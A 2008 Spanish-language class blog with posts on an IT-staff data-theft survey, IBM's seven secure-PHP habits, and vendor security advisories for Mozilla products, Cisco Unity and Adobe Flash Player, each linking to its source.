Les dejo esta liga de un tutorial de GDB de Stallman.

domingo, 19 de octubre de 2008

La mayoría de los empleados TI robaría datos sensibles en caso de ser despedidos

Nada menos que un 88% de los administradores TI admitieron que intentaría llevarse consigo secretos corporativos en caso de ser despedidos repentinamente. Los principales objetivos de sus robos incluirían contraseñas del CEO, bases de datos de clientes, planes de investigación y desarrollo, informes financieros y listas de contraseñas privilegiadas, entre otros.

La investigación de Cyber-Ark, basada en un sondeo realizado a 300 profesionales TI, también pone de relieve que de ese 88%, una tercera parte utilizaría la lista de contraseñas privilegiadas para conseguir acceso a documentos valiosos, como información financiera, cuentas, salarios y otros datos confidenciales.

Para ver la noticia completa consulten la página

http://www.idg.es/pcworldtech/La_mayoria_de_los_empleados_TI_robaria_datos_sensi/doc70961-seguridad.htm

7 habitos para escribir aplicaciones seguras en PHP

Considerando el tema que actualmente estamos viendo en clase considero que esta noticias es de gran importancia, porque ademas de ser un tema que abordaremos permite hacer consideraciones al momento de desarrollar en php y que contribuyen a reducir las vulnerabilidades.

Anexo parte de la noticia y el link donde puede profundizarse para mayor información.

7 habitos para escribir aplicaciones seguras en PHP

Cuando se empieza a tomar en cuenta la seguridad, hay que recordar que en adicion a la plataforma de desarrollo y a los problemas de seguridad del sistema operativo, es necesario garantizar que se esta escribiendo codigo seguro. IBM por medio de la sección DeveloperWorks publica 7 buenos habitos que, cuando se escribe codigo PHP, tenerlos en cuenta hace que las aplicaciones sean aun mas seguras:

1. Validar las entradas del usuario. Es posiblemente el habito mas importante que se pueda adoptar cuando se comienza a considerar la seguridad. Las vulnerabilidades mas importantes se derivan del exceso de confianza en los datos que introduce el usuario.
2. Proteger el sistema de archivos. El efecto que podria llegar a tener el robo de un archivo de sistema podria llegar a impactar no solo a la aplicacion, sino tambien al sistema operativo y al servidor en general.
3. Proteger la Base de Datos. La informacion es el activo mas importante que protege la empresa, generalmente las aplicaciones administrativas manejan datos bastante sensibles que se manejan con mucho recelo.
4. Proteger los datos de sesion. Toda informacion almacenada en la sesion es susceptible de ser visualizada por cualquiera. Tienes dos alternativas: cifrar los datos, lo que no garantiza por completo su privacidad si es un metodo reversible y/o almacenarlos en Base de datos.
5. Protegerse contra las vulnerabilidades de tipo Cross-Site Scripting (XSS). Esta vulnerabilidad esta relacionada con el primer habito recomendado, pero ademas de protegerte de la informacion que aceptas en tu aplicacion, tambien hay que cuidar la informacion que se sale de la misma, principalmente para no incluir codigo que se ejecute/interprete indebidamente del lado del cliente.
6. Verificar el intercambio de informacion (posts) entre formas. Ya que la conexion entre el cliente y el servidor no es persistente, debe hacerse una comprobacion del 'remitente' de los datos, ya que pudieron haber sido enviados desde cualquier forma sin haber pasado por las validaciones esperadas.
7. Protegerse contra ataques Cross-Site Request Forgeries (CSRF). Este tipo de ataque se basa en la ganancia de privilegios mayores de los debidos por medio de expolits.

Seas un programador novato o ya experimentado, considerar estos habitos sin duda te llevará a conseguir aplicaciones que manejen de una forma mas segura la informacion. Una descripcion mucho mas completa de cada uno de estos puntos asi como código fuente que puedes implementar para cumplir con estas sugerencias esta en la siguiente dirección:

http://www.ibm.com/developerworks/opensource/library/os-php-secure-apps/index.html?ca=dgr-btw01PHP-7Habits&S_TACT=105AGX59&S_CMP=grsite-btw01

sábado, 18 de octubre de 2008

24/09/2008 Múltiples vulnerabilidades en Firefox, Thunderbird y Seamonkey

La Fundación Mozilla ha informado sobre múltiples vulnerabilidades en varios de sus productos que podrían ser aprovechadas por un atacante remoto para revelar información sensible, perpetrar ataques de cross-site scripting, provocar una denegación de servicio, saltarse restricciones de seguridad o ejecutar código arbitrario en un sistema vulnerable.

A continuación se detallan las vulnerabilidades publicadas:
1- Desbordamiento de búfer causado por URLs codificadas con UTF-8 especialmente manipuladas. Esto podría ser aprovechado por un atacante remoto para ejecutar código arbitrario. Afecta a Firefox 2.x y SeaMonkey.
2- Salto de restricciones de seguridad al no comprobar de forma adecuada la política de mismo origen en nsXMLDocument::OnChannelRedirect(), lo que podría ser aprovechado para ejecutar código JavaScript en el contexto de un sitio web diferente al original. Afecta a Firefox 2.x, Thunderbird y SeaMonkey.
3- Escalada de privilegios y cross-site scripting causado por múltiples errores de validación de entrada en feedWriter. Esto podría permitir que un atacante ejecutase código script arbitrario con los privilegios de chrome (componente principal de Firefox, no confundir con el navegador de Google). Afecta sólo a Firefox 2.x.
4- Un error durante el manejo de las pulsaciones del ratón podría permitir que un atacante moviera el contenido de la ventana mientras el ratón está siendo pulsado, pudiendo causar que un item fuera arrastrado en vez de "clickeado". Esto podría ser aprovechado para forzar el arrastre de ciertos componentes, lo que permitiría, entre otros efectos, realizar una descarga no solicitada. Afecta a Firefox 2.x, 3.x y SeaMonkey.
5- Múltiples fallos relacionados con XPCnativeWrapper podrían permitir a un atacante remoto ejecutar código script arbitrario con los privilegios de chrome. Afecta a Firefox 2.x, 3.x y SeaMonkey. Podría afectar a Thunderbird si se habilita la ejecución de JavaScript.
6- Múltiples problemas de estabilidad en los motores de diseño, gráficos y JavaScript de los productos Mozilla, que podrían ser explotados para causar una denegación de servicio o incluso ejecutar código arbitrario aprovechando una posible corrupción de memoria. Afecta a Firefox 2.x, 3.x, SeaMonkey y Thunderbird.
7- Cross-site scripting provocado por la interpretación de forma errónea de caracteres BOM (Byte-Order Mark, tres caracteres que se encuentran al principio de un archivo para indicar que está codificado como UTF-8, UTF-16 o UTF-32. Ejemplo:  ). Afecta a Firefox 2.x, 3.x, SeaMonkey y Thunderbird.
8- Errores en el protocolo "resource:" que podrían ser aprovechados para conducir ataques de directorio trasversal y revelar información sensible. Afecta a Firefox 2.x, 3.x, SeaMonkey y Thunderbird.
9- Un error en el decodificador XBM podría permitir la lectura de pequeñas porciones aleatorias de memoria, lo que daría lugar a la revelación de información sensible. Afecta a Firefox 2.x y SeaMonkey.
Más Información:
Mozilla Foundation Security Advisory 2008-37: http://www.mozilla.org/security/announce/2008/mfsa2008-37.html

viernes, 17 de octubre de 2008

Solucionando agujeros en Unity Server

Cisco ha publicado la actualización de seguridad para Unity Server, su sistema unificado de mensajería.

Unity enlaza con Microsoft Exchange Server y Lotus Notes, que realiza la integración de voz y fax en las empresas, además de un sistema de correo electrónico, que permite a los usuarios acceder a sus mensajes de voz a través de Internet, de forma que puedes escuchar los mensajes de correo electrónico en el teléfono del servidor remotamente.

Las actualizaciones cierran varias vulnerabilidades que permite a los intrusos inspeccionar la configuración del sistema e incluso si la autenticación anónima está habilitada modificarla.

Además, se cierra un cross-site scripting (XSS) que explota un bug que podría colgar el servidor, la actualización se afecta a las versiones 4.2 (1) ES161, 5.0 (1) ES53 y 7.0 (2) ES8.

Los clientes registrados pueden descargar la actualización desde la página Web de Cisco.

Para más información visita:
http://www.cisco.com/warp/public/707/cisco-sr-20081008-unity.shtml
http://www.cisco.com/warp/public/707/cisco-sa-20081008-unity.shtml

Adobe Flash Player 9

Adobe ha solucionado varios agujeros de seguridad en Flash Player 9, además del famoso error de clickjacking.

Según el aviso las vulnerabilidades afectan a todas las versiones de Flash Player hasta la 9.0.124.0.

La vulnerabilidad esta referida al API FileReference y es particularmente crítica, ya que permite la inyección arbitraria de código malicioso que podría ejecutarse con los permisos del usuario.

Adobe también ha eliminado Clickjacking, y ha añadido más seguridad al manejo de las políticas de transferencias de archivos con el fin de evitar cualquier posible elevación de privilegios dentro de aplicaciones Web.

El otro agujero de seguridad está causado por un problema con el escaneado de puertos del que no se han dado muchos detalles.

Todas las vulnerabilidades pueden ser explotadas remotamente utilizando documentos swf manipulados, lo que debe hacer un atacante es atraer a un usuario a un sitio Web que contengan objetos nocivos Flash.

Los usuarios que visitan sitios Web de confianza no deben asumir que son seguras, ya que cualquier banners de publicidad podría estar comprometido.

Adobe recomienda que todos los usuarios instalen la nueva versión de Flash Palcer.

Para más información visita
http://www.adobe.com/support/security/bulletins/apsb08-18.html